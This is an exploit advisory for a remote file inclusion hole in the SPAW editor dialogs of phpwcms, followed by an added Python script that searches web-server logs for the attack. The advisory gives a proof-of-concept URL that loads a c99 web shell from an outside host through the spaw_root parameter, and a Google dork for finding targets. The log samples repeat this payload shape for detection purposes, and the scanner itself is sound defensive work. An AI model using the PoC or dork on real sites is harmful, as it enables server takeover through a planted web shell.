http://www.qmars.sub.ir
qmarsfire@yahoo.com
=============================================================================================================================
Vuln In :
include $spaw_root.'class/lang.class.php';

Affected Files :
include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php

Vendor Website: http://www.phpwcms.de/

PoC:
http://www.victim.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://mormoroth.by.ru/c99.php?

Google Dork:
inurl:"phpwcms/index.php?id="
=============================================================================================================================
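
Added example (not part of the original advisory and not phpwcms or SPAW code): a web-server log check for requests to the affected dialog scripts that carry a spaw_root query parameter, the variable the vulnerable include uses. The function names, the Combined Log Format input and the sample lines are assumptions made for this example; it also assumes legitimate dialog requests never pass spaw_root in the query string.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Dialog scripts the advisory lists as affected.
DIALOG_DIR = "include/inc_ext/spaw/dialogs/"
AFFECTED = {"table.php", "a.php", "colorpicker.php", "confirm.php",
            "img.php", "img_library.php", "td.php"}

# Request part of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme or stream wrapper (http://, ftp://, data:, ...)
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:)", re.I)

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /phpwcms/index.php?id=1,0,0,1,0,0 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://files.example/x.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /phpwcms/include/inc_ext/spaw/dialogs/img.php?spaw_root=http%3A%2F%2Ffiles.example%2Fx.txt%3F HTTP/1.1" 200 312',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /phpwcms/include/inc_ext/spaw/dialogs/td.php?spaw_root=../ HTTP/1.1" 200 100',
    '192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /phpwcms/include/inc_ext/spaw/dialogs/a.php?lang=en HTTP/1.1" 200 900',
]


def classify(line):
    """Return None, 'spaw_root-override' or 'spaw_root-remote' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    path = unquote(target.path)
    if DIALOG_DIR not in path or path.rsplit("/", 1)[-1] not in AFFECTED:
        return None
    # Assumption: legitimate dialog requests never pass spaw_root in the query.
    values = parse_qs(target.query, keep_blank_values=True).get("spaw_root")
    if values is None:
        return None
    if any(REMOTE_RE.search(v) for v in values):  # parse_qs already percent-decoded
        return "spaw_root-remote"
    return "spaw_root-override"


def scan(lines):
    verdicts = ((i, classify(line)) for i, line in enumerate(lines))
    return [(i, v) for i, v in verdicts if v]

if __name__ == "__main__":
    for index, verdict in scan(SAMPLE_LOG):
        print(verdict, SAMPLE_LOG[index])
```

Access logs record only the query string, so a spaw_root value sent in a POST body or cookie would not be seen by this check.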